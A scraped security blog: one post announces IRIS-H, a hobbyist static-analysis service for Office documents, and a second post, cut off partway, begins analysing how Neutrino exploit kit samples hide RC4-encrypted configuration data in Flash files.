<b><span style="color: #3d85c6; font-size: large;">Introduction</span></b><br />
<br />
IRIS-H is an online web service that performs static analysis of the files stored in a directory-based or strictly structured formats. The service disassembles submitted files into individual components based on the detected file format and performs static analysis of each of the components. The analysis process involves sequentially reading components' binary data and enriching it with human readable information. The enrichment process is based on the binary data description as per official file format specification. Further rule-based evaluation is performed on the extracted data in order to establish if the submitted file can be harmful to a computer system.<br />
<br />
<b><span style="color: #3d85c6; font-size: large;">Disclaimer</span></b><br />
<br />
Currently, the service is still being developed and running in <a href="https://en.wikipedia.org/wiki/Software_release_life_cycle#Alpha" rel="nofollow" target="_blank">alpha</a> phase of the release life cycle. Application updates are pushed regularly and may require full data flush. There is absolutely no guarantee the uploaded data and corresponding generated reports will be available during '<span style="color: #3d85c6;">alpha</span>' cycle. Any development/maintenance is done in my free time - this service is the result of a hobby rather than a paid job.<br />
<br />
<span style="color: #3d85c6; font-size: large;"><b>Acknowledgements</b></span><br />
<span style="color: #3d85c6; font-size: large;"><b><br /></b></span>
I'd like to say '<span style="color: #3d85c6;">Thank You!</span>' to the following individuals and organizations for their direct and/or indirect support. 👍<br />
<ul>
<li>VirusTotal crew</li>
<li>StackOverflow ReactJS and NodeJS communities</li>
<li>Decalage</li>
<li>Individual security researchers who provided their invaluable feedback that materialized into improved and new features (I do not support fame leeching, so no names, but you know who you are)</li>
</ul>
<br />
<b><span style="color: #3d85c6; font-size: large;">IRIS-H Service</span></b><br />
<br />
<b><span style="color: #3d85c6;">Pre-history</span></b><br />
<br />
(skip to the next paragraph if you're not into fairy tales and stuff...)<br />
Once upon a time I decided that challenging myself with learning JavaScript flavors is a great idea... well, still think it's a great idea... So, I set out on a quest to build something as I learn it. Looking far and wide, I thought a simple console based digital forensic tool could be a good start. Little did I know at the time, on how far it will actually take me... and so I ended up creating IRIS-H. The name doesn't really stand for anything with '<span style="color: #3d85c6;">Next Generation</span>' or '<span style="color: #3d85c6;">Artificial Intelligence</span>' or '<span style="color: #3d85c6;">Blockchain</span>' or even '<span style="color: #3d85c6;">Cyber</span>' buzz words in mind(sorry, no lasers either), despite having a logo. It's simply my tribute to all the hard working Irish people I had a pleasure to encounter in my last 20 years living in Ireland.<br />
<br />
<b><span style="color: #3d85c6;">So, what's all about?...</span></b><br />
<br />
I'd like to share an online tool I've been working on for the last a few months. IRIS-H is mainly being positioned as a digital forensics tool, though it has some rule-based logic it applies in order to determine the outcome of opening the analysed file on a computer system. The digital forensics aspect is revolving around putting descriptive meaning on the binary data derived from the analyzed file. Where possible, the tool attempts to extract digital artifacts to allow for further manual or automated analysis. In the case of malicious files analysis, a trained eye could leverage the tool to help him/her to perform a simple '<span style="color: #3d85c6;">campaign</span>' type attribution based on the data derived by the service and their best judgment.<br />
<br />
It's important to note that IRIS-H is not a sandbox environment. The submitted file is never opened with its corresponding host application. This slightly limits IRIS-H functionality in terms of obtaining network based indicators of compromise(IoC). Still, the service attempts to evaluate the risk of opening the file on a computer system based on the IoCs derived from the binary data and presence of certain digital artifacts. Sometimes, when you search for a quick answer, this might be all you need.<br />
<br />
IRIS-H can do some tricks, but the service is far from being mature. It's at the stage where it just started bringing some value to the work I do, so I hope it can do the same for the others.<br />
<br />
<b><span style="color: #3d85c6;">Right, what can it do?...</span></b><br />
<br />
The interaction with the service is done through its web interface. The interface allows for navigation through web pages that offer specific service features.<br />
<ul>
<li><b><span style="color: #3d85c6;">Home Page</span></b> - offers ability to view latest file submissions. The view is utilizing a table to present the following data: submission time, submitted file MD5 hash, file name at submission time, detected file type and the result of rule-based risk evaluation.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz9PW-_-MWTWdfdpXjR0VBbf4AfkhU2iKm6wECP6eGGXKnzGzUvQ-0IOXwfiUqX2v11MlReLlfUpfDyN-AiZ2L1qoIx6AUklzCPQhzWp5hDpLAahmZmWeuvjgwsLefC-_2-7koovgOprim/s1600/homePage.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" data-original-height="210" data-original-width="997" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz9PW-_-MWTWdfdpXjR0VBbf4AfkhU2iKm6wECP6eGGXKnzGzUvQ-0IOXwfiUqX2v11MlReLlfUpfDyN-AiZ2L1qoIx6AUklzCPQhzWp5hDpLAahmZmWeuvjgwsLefC-_2-7koovgOprim/s320/homePage.PNG" title="latest submissions view" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Latest Submissions table view</td></tr>
</tbody></table>
<ul>
<li><span style="color: #3d85c6;"><b>Search Page</b></span> - offers ability to search the service database using MD5, SHA1 or SHA256 hash strings. If a successful analysis already exists for the file with the provided hash the user is forwarded to a corresponding Report Page(more on this below).</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSJyWtUV05gE92GTn_x8AsAZ8NdrkPO9fUHhPwWwzwTmezruhPbhJRWWQNUJ8kyxjQIB0BPb4xqiPjZ6wrcVgJyXo4KbM_nqQ7hWhujZZJCRr6IhBjm-IreG_RtZjGNSNG5fnYWAKchG/s1600/searchPage.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="124" data-original-width="648" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSJyWtUV05gE92GTn_x8AsAZ8NdrkPO9fUHhPwWwzwTmezruhPbhJRWWQNUJ8kyxjQIB0BPb4xqiPjZ6wrcVgJyXo4KbM_nqQ7hWhujZZJCRr6IhBjm-IreG_RtZjGNSNG5fnYWAKchG/s320/searchPage.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Search Form view</td></tr>
</tbody></table>
<br />
<ul>
<li><b><span style="color: #3d85c6;">Submit Page</span></b> - offers ability to submit a file to be analyzed. File size and type validations are performed on this page. The page provides '<span style="color: #3d85c6;">drag-and-drop</span>' and '<span style="color: #3d85c6;">no-submit-button</span>' component to allow service users to select a file to submit. The upload file size limit is set to 10MB. If submitted file type is not supported an alert is spawned notifying the user. Only single file submissions are supported at this time. ZIPed files are not accepted yet.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FsuzOCAsy53FTvoiwh4ij4hz4y3a2hrAl40a_d3RutbDKuRYLQzjgQ3YOLL9vNWi_usswERbnGC3PLYQiL2tSwTs-E5_SdDdH9AmzsJ4us73b5a5pHa7UzGj_B-t5cq4U2zTJB195B32/s1600/submitPage.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="412" data-original-width="1105" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FsuzOCAsy53FTvoiwh4ij4hz4y3a2hrAl40a_d3RutbDKuRYLQzjgQ3YOLL9vNWi_usswERbnGC3PLYQiL2tSwTs-E5_SdDdH9AmzsJ4us73b5a5pHa7UzGj_B-t5cq4U2zTJB195B32/s320/submitPage.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Submit Page dropzone box</td></tr>
</tbody></table>
<div>
The following are some examples of what IRIS-H service can handle at this stage:</div>
<div>
<ul>
<li>Files saved in Microsoft Office 97-2003 format (DOC, XLS, PPT) - only DOC files are fully supported at the moment</li>
<li>Files saved in Microsoft Office 2007+ format (DOCX, PPTX) - only DOCX files are fully supported at the moment. XLSX are not being accepted yet.</li>
<li>VBA project files extracted from the Microsoft Office documents that are saved in Open Office XML format</li>
<li>Objects embedded into other Microsoft Office documents including those in OOXML format</li>
</ul>
</div>
<div>
Technically, IRIS-H will accept and attempt to process any file in OLE-CF format. There are certain case per case limitations though, where the service might not have a parser for a '<span style="color: #3d85c6;">not-so-common</span>' OLE stream types.</div>
<div>
<br /></div>
Once a file is accepted and uploaded, IRIS-H begins dissecting the submitted file into separate components for further automated static analysis. When the analysis is completed, the user is forwarded to a corresponding Report Page.<br />
<br />
<b><span style="color: #3d85c6;">Report Page</span></b> is where everything comes together and to help service users navigate through the chunks of information, the page provides a navigation bar.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnEyKMkoInjoLfbn6YFbUMzA-IeikqUMsOCyPnaaIejWdnhxWqiO54hJqbzwHUu0rXR230rMKDZVthytlUwQpBxrXlxoO_uim1srTBQfsLt6RiL9rb6qD7v0rtuLfts1k1HBNVhe9UGgHM/s1600/leftNavBar.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="334" data-original-width="170" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnEyKMkoInjoLfbn6YFbUMzA-IeikqUMsOCyPnaaIejWdnhxWqiO54hJqbzwHUu0rXR230rMKDZVthytlUwQpBxrXlxoO_uim1srTBQfsLt6RiL9rb6qD7v0rtuLfts1k1HBNVhe9UGgHM/s320/leftNavBar.PNG" width="162" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Left Navigation Bar Example</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
The information presented on the Report Page is a mixture of high level and '<span style="color: #3d85c6;">deep dive</span>' forensics data. The original idea was to be able to export it into a file format that can be stored or shared(like, PDF or similar), but due to some technical challenges I couldn't overcome I enabled report availability through its URL link.<br />
<br />
<span style="color: #3d85c6;"><b>Alright, but what's in it for me?...</b></span><br />
<br />
Well, one would have to try it out and see, right? 😜 IRIS-H service is available at <a href="https://iris-h.malwageddon.com/">https://iris-h.malwageddon.com/</a> . Please make sure you get yourself familiar with <a href="https://iris-h.malwageddon.com/tos" target="_blank">Terms of Service</a>. There is also <a href="https://iris-h.malwageddon.com/about" target="_blank">About</a> page that provides more details about the service.<br />
<br />
... but just to give you some ideas, the screenshots below highlight some of the findings I came across of using file samples at my disposal.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3D1Q8OS6BNwkRfroxpiWlVSyCDyG2oCdjK_FHOsvbDEA8B3Hlvubfai7e5jbNV34AdpKnK2mkCxo63Wqs_nmC_0MXT8Ljh_rTN5SqwAcTw_hSbq2fTQaMZX6msW6zerFaTO9C8-hfjc_7/s1600/reportPageEx13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1018" data-original-width="1240" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3D1Q8OS6BNwkRfroxpiWlVSyCDyG2oCdjK_FHOsvbDEA8B3Hlvubfai7e5jbNV34AdpKnK2mkCxo63Wqs_nmC_0MXT8Ljh_rTN5SqwAcTw_hSbq2fTQaMZX6msW6zerFaTO9C8-hfjc_7/s320/reportPageEx13.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">VBA Digital Signature details</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUyG2xtrakrlQOu-_Vo6Vf0qrCiPua80pGGH3f__3gilsyQpvUdTDX37YC70VlMEW8jLOvNLt0gn8XsPMjGb32Y7ccSLxLBy1xwW9hHwYDWotuoVMGX65gpdezfZfHxYlUci_WZTD-yZF6/s1600/reportPageEx12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="277" data-original-width="685" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUyG2xtrakrlQOu-_Vo6Vf0qrCiPua80pGGH3f__3gilsyQpvUdTDX37YC70VlMEW8jLOvNLt0gn8XsPMjGb32Y7ccSLxLBy1xwW9hHwYDWotuoVMGX65gpdezfZfHxYlUci_WZTD-yZF6/s320/reportPageEx12.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Detection for Microsoft Office field characters</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8IznPQC6enP7K3dsfPw-OV215RyW_F4yyIZwaCbJmRqK5b_iIPH7i9rhREeOdxr4rj_uKyjYldYEZBHCOuJZbj5MZ9al_ivCNm9vzNHYMjDw3RJpc7Y9HhL9aB3F4Ojm4TjO8Qd9zZmbq/s1600/reportPageEx1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="218" data-original-width="627" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8IznPQC6enP7K3dsfPw-OV215RyW_F4yyIZwaCbJmRqK5b_iIPH7i9rhREeOdxr4rj_uKyjYldYEZBHCOuJZbj5MZ9al_ivCNm9vzNHYMjDw3RJpc7Y9HhL9aB3F4Ojm4TjO8Qd9zZmbq/s320/reportPageEx1.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H detected embedded VBS script in the submitted file</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl3BHfP81R8Ib3OZXKXmsBm7woCujOIF0K2cddQrVqCp4IqSSkW5ERutivkoGk01CkhVJZf2thIa13TSOP0CAKH9fWuFBuhn3FLGfTvDFxJj9x6QMcv9iIR4BHqfVSq0Y8dF1C6Y1fZzCI/s1600/reportPageEx2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="743" data-original-width="622" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl3BHfP81R8Ib3OZXKXmsBm7woCujOIF0K2cddQrVqCp4IqSSkW5ERutivkoGk01CkhVJZf2thIa13TSOP0CAKH9fWuFBuhn3FLGfTvDFxJj9x6QMcv9iIR4BHqfVSq0Y8dF1C6Y1fZzCI/s320/reportPageEx2.PNG" width="267" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'<span style="color: #3d85c6;">deep-dive</span>' digital forensics view of the VBS file reported above.</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCfal0wTjK2TvHL1OwI0S-CqEn_pZ2iRkzMsdQbXr1P3LQJy5CXLdFlBvRMa2c9ZlKn8ICa7eBJ6DK-mRN9cvOM3snBdTtHrAwrbEVsL4pW60fOa-6Np6LiJZlZYdN0gMFlA9uGlRj6wfI/s1600/reportPageEx3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="867" data-original-width="623" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCfal0wTjK2TvHL1OwI0S-CqEn_pZ2iRkzMsdQbXr1P3LQJy5CXLdFlBvRMa2c9ZlKn8ICa7eBJ6DK-mRN9cvOM3snBdTtHrAwrbEVsL4pW60fOa-6Np6LiJZlZYdN0gMFlA9uGlRj6wfI/s320/reportPageEx3.PNG" width="229" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Results of VBA scripts analysis</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF2GB7QZZc6ju2YlFMUaxOgeOGIfOOI4QcsOt7YSValM9cfI7tneVksW5cPP0iKQUnSOCZyUBYuiSLprJRn2p88ckrFaNrem-WxsfpL-8dvQsBUG5Pz5B5KTbtDrbl-Ymqv0bpapReBISc/s1600/reportPageEx4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="304" data-original-width="624" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF2GB7QZZc6ju2YlFMUaxOgeOGIfOOI4QcsOt7YSValM9cfI7tneVksW5cPP0iKQUnSOCZyUBYuiSLprJRn2p88ckrFaNrem-WxsfpL-8dvQsBUG5Pz5B5KTbtDrbl-Ymqv0bpapReBISc/s320/reportPageEx4.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partial view of document embedded form analysis showing UA string hidden in form's tag field</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyK2Gmf2XRLUyN2UjONCEB5JcClzx0afMR-KZWgQXYgTdJxEiS6XcVjQMPvRJ_oAZj7yevACOksr8VRZpZ8euZQMTK52hcVe3dAlWlDiP1oEQz_o_WUQ20PaVO5BH8sROxnXnyv4dJs1x/s1600/reportPageEx5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="235" data-original-width="623" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyK2Gmf2XRLUyN2UjONCEB5JcClzx0afMR-KZWgQXYgTdJxEiS6XcVjQMPvRJ_oAZj7yevACOksr8VRZpZ8euZQMTK52hcVe3dAlWlDiP1oEQz_o_WUQ20PaVO5BH8sROxnXnyv4dJs1x/s320/reportPageEx5.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partial view of document meta data analysis showing URLs stored in the document</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8xp7nL9N9OP4Brp-rsYFtwjtXzCqknEQBmWAO88raA4AQVBII-J5G1w7vuqN4PI1-LGJ42aoh_3hCYkuQjxIpAEKsf51o5CH2Up3vaHhsdfBLLyxpjqMYjBalAoFvJPJaaIoKcWoenFVL/s1600/reportPageEx6.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="793" data-original-width="623" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8xp7nL9N9OP4Brp-rsYFtwjtXzCqknEQBmWAO88raA4AQVBII-J5G1w7vuqN4PI1-LGJ42aoh_3hCYkuQjxIpAEKsf51o5CH2Up3vaHhsdfBLLyxpjqMYjBalAoFvJPJaaIoKcWoenFVL/s320/reportPageEx6.PNG" width="251" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'<span style="color: #3d85c6;">deep-dive</span>' forensics view of a linked object showing object's name and network path where it's stored</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgHpC2V1TNOsjMN-BXTzs7rjvS5w3h6HkHTBELP11M7xBwkdK7VHRPsIMyLoDNYbWGrJClX7Dibdp_KgUAfCRH4H7JwnikO1FELWha4hSMYLlbj6jexE-fUeNCbRBK_CjofQ9tPAKp6xhv/s1600/reportPageEx7.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="495" data-original-width="623" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgHpC2V1TNOsjMN-BXTzs7rjvS5w3h6HkHTBELP11M7xBwkdK7VHRPsIMyLoDNYbWGrJClX7Dibdp_KgUAfCRH4H7JwnikO1FELWha4hSMYLlbj6jexE-fUeNCbRBK_CjofQ9tPAKp6xhv/s320/reportPageEx7.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'<span style="color: #3d85c6;">deep-dive</span>' forensics view of data from WordDocument stream showing Revision History, System Fonts and Users data</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUycjYVuJxA5iAkakL6VgPzUqyL8ZH4Q_1N0H7Edo_rVfERsD5574k7N6nif0FntGYhamDzLwHPNInxnlZzZxBZ4QXPYeXEEf9d9xJEidEa2U6xIe3kZLb4tPbJ7pm5WOTUo7ukqfaoRX/s1600/reportPageEx8.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="571" data-original-width="620" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUycjYVuJxA5iAkakL6VgPzUqyL8ZH4Q_1N0H7Edo_rVfERsD5574k7N6nif0FntGYhamDzLwHPNInxnlZzZxBZ4QXPYeXEEf9d9xJEidEa2U6xIe3kZLb4tPbJ7pm5WOTUo7ukqfaoRX/s320/reportPageEx8.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of Extracted Images preview</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQW7JMAbX_t-K7e4Sx43ZcohjKxB9fSMi_a9RkBv4J7hsd8onAnHXn538XLzsLhhbzwNvgjo5DGDokw30PNJbxTFoYkZNZ945mDfXsuYBfeLwmnUSd3d-Zo-bJPjvP4jjMRK5tBEErYqz/s1600/reportPageEx10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="205" data-original-width="626" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQW7JMAbX_t-K7e4Sx43ZcohjKxB9fSMi_a9RkBv4J7hsd8onAnHXn538XLzsLhhbzwNvgjo5DGDokw30PNJbxTFoYkZNZ945mDfXsuYBfeLwmnUSd3d-Zo-bJPjvP4jjMRK5tBEErYqz/s320/reportPageEx10.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of findings view showing evidence of a linked ZIP file from the document</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZLlB_e7O_PLiQFifMtOrJ4zN5z2tynJ8ln6gAkt6miB_S_nFT-k0jSgYcX6kb7nEJAi22BE8iw7KBgV9NfapYt_xCVqZlJuglrsKyXGV06k5WyhKRGNJOLoLlM3J9O-c3D4RzCDrFHTJ/s1600/reportPageEx11.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="213" data-original-width="619" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZLlB_e7O_PLiQFifMtOrJ4zN5z2tynJ8ln6gAkt6miB_S_nFT-k0jSgYcX6kb7nEJAi22BE8iw7KBgV9NfapYt_xCVqZlJuglrsKyXGV06k5WyhKRGNJOLoLlM3J9O-c3D4RzCDrFHTJ/s320/reportPageEx11.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of extracted downloadable artifact (VBA macro script in this case)</td></tr>
</tbody></table>
<br />
<h2>
<span style="color: #3d85c6;">Closing Note</span></h2>
<div>
If you have any feedback please do not hesitate to reach out. I believe, there is no better way to improve something, but to hear what people think about it.</div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-87369815362051087002015-03-22T21:33:00.000+00:002015-03-22T21:33:14.972+00:00Data Obfuscation: Now you see me... Now you don't...<b><span style="color: #3d85c6;">Introduction</span></b><br />
<br />
This blog post shows how malware authors use Adobe Flash files to hide their creations' '<span style="color: #3d85c6;">sensitive</span>' data. I'll be using 2 recent Neutrino EK and 1 FlashPack <a href="http://www.torrycrass.com/2015/02/06/flash-malware-propagating-via-cdn-cve-2015-0313/" rel="nofollow" target="_blank">malvertising</a> samples to demonstrate it. In the case of Neutrino EK our goal will be extraction and decryption of its configuration file and in the malvertising case we'll be after the initial payload URL + exploit shellcode.<br />
<br />
<b><span style="color: #3d85c6;">Executive Summary</span></b><br />
<br />
It's fair to say that the exploit kit world is spinning around Adobe Flash files lately. ActionScript scripting language that drives SWF files execution is quite versatile and when combined with other SWF features, like, binary data containers or images embedding creates a strong application environment capable of executing relatively complex tasks. Some exploit kit authors already using SWF files to be all-in-one '<span style="color: #3d85c6;">solution</span>'. For example, Neutrino EK(aka Job314, aka Alter EK) uses Adobe Flash Player files to store exploits code, execution control logic(environment checks, exploit code selection, etc.), decryption keys for its various components and the configuration file. SWF file obfuscation applications further enhance data hiding capabilities and also drastically impede reverse engineering efforts making SWF files even more attractive to malware authors. The SWF files analysis below demonstrates how ActionScript combined with base64 encoding, RC4 encryption and image files can be used to hide the data.<br />
<br />
<br />
<b><span style="color: #3d85c6;">What is magic?</span></b><br />
<br />
The Neutrino EK sample analysed in this section was captured in Dec 2014. Its relatively simple landing <a href="http://pastebin.com/TurrRB0H" rel="nofollow" target="_blank">page</a> contains a request for an SWF file and what appears to be a base64 encoded GIF file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNi-BiWbA1Z_bdNR2iGrlK6If6Nha6b2-uFWB66OD5WksuD_caeWBwxUvzOmcZC1IySfN7sB1EIAkl5WPsMh5zthV_Dc-g1ALgT2A_SEsz-Hcr80Kf6oBmIqBuxlkIcc0vE_fnHqfR8Yw6/s1600/Dec2014_landing.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNi-BiWbA1Z_bdNR2iGrlK6If6Nha6b2-uFWB66OD5WksuD_caeWBwxUvzOmcZC1IySfN7sB1EIAkl5WPsMh5zthV_Dc-g1ALgT2A_SEsz-Hcr80Kf6oBmIqBuxlkIcc0vE_fnHqfR8Yw6/s1600/Dec2014_landing.PNG" height="99" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - base64 encoded GIF stored on the landing page</i></span></div>
<br />
Let's start with the GIF file and try to manually reconstruct it. After unescaping and base64 decoding it, we ended up with a chunk of binary data that's anything, but a GIF file. So, it has to mean something else. Note that the <img> tag has '<span style="color: #3d85c6;">id</span>' parameter - '<span style="color: #3d85c6;">mqdscriyolhypdbstnmv</span>'. There is no reference to it on the landing page, so quite possible it's being used by the SWF file. After some reverse engineering '<span style="color: #3d85c6;">kung-fu</span>' and ActionScript review we come across the function below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTgNZlBZly2wr-6WoTiQ5q7poM5jQBlhetlzOIgURgZmtB4AtTfB3a9x1JQXSDvFpK6O8FJhycl8XzJJbZJMasvKkBB0AA7x7MuyDqM7ccVHuztHBSjjE5pOVbXizt0iprnicdaWwB7dAc/s1600/rtConfig_decode_routine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTgNZlBZly2wr-6WoTiQ5q7poM5jQBlhetlzOIgURgZmtB4AtTfB3a9x1JQXSDvFpK6O8FJhycl8XzJJbZJMasvKkBB0AA7x7MuyDqM7ccVHuztHBSjjE5pOVbXizt0iprnicdaWwB7dAc/s1600/rtConfig_decode_routine.png" height="97" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - AS3 function to decode data stored in '<span style="color: #3d85c6;">mqdscriyolhypdbstnmv</span>' landing page element</i></span></div>
<br />
The function appears to do the following:<br />
<ul>
<li>compiles and calls a JavaScript to pull out the content of the landing page element with id - '<span style="color: #3d85c6;">mqdscriyolhypdbstnmv</span>'</li>
<li>splits the pulled content at '<span style="color: #3d85c6;">base64,</span>' expression creating 2 data chunks</li>
<li>unescapes and base64 decodes the '<span style="color: #3d85c6;">second</span>' chunk</li>
<li>runs the resulting data through RC4 decryption routine</li>
</ul>
So, we have already completed '<span style="color: #3d85c6;">unescape</span>' and '<span style="color: #3d85c6;">base64 decode</span>' operations, all we're missing now is the RC4 decryption pass for which we need to know the key. The routine above tells us to look for it in '<span style="color: #3d85c6;">getRtConfigKey()</span>' function. Let's take a look there.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
